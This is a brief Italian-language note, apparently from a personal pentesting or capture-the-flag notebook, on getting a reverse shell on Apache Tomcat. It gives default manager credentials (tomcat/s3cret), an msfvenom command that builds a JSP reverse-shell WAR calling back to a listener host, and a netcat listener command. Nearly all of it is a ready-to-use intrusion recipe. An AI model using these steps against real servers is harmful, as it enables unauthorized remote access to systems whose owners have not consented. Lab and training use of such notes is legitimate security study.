tags: Tomcat reverse_shell Tomcat_Reverse_Shell
Per caricare una reverse shell su Tomcat dobbiamo prima loggarci nella pagina /manager, le credenziali di default sono tomcat e s3cret.
Una volta dentro possiamo andare nella pagina nella sezione WAR file to deploy e caricare la seguente reverse shell:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.9.0.XXX LPORT=4444 -f war -o shell.war
nc -lvnp 4444
Non possiamo usare nessun’altra reverse shell perchè Tomcat capisce solo il linguaggio Java e quindi solo file .war possiamo eseguire, gli altri te li farà caricare, ma non riuscirai ad eseguirli.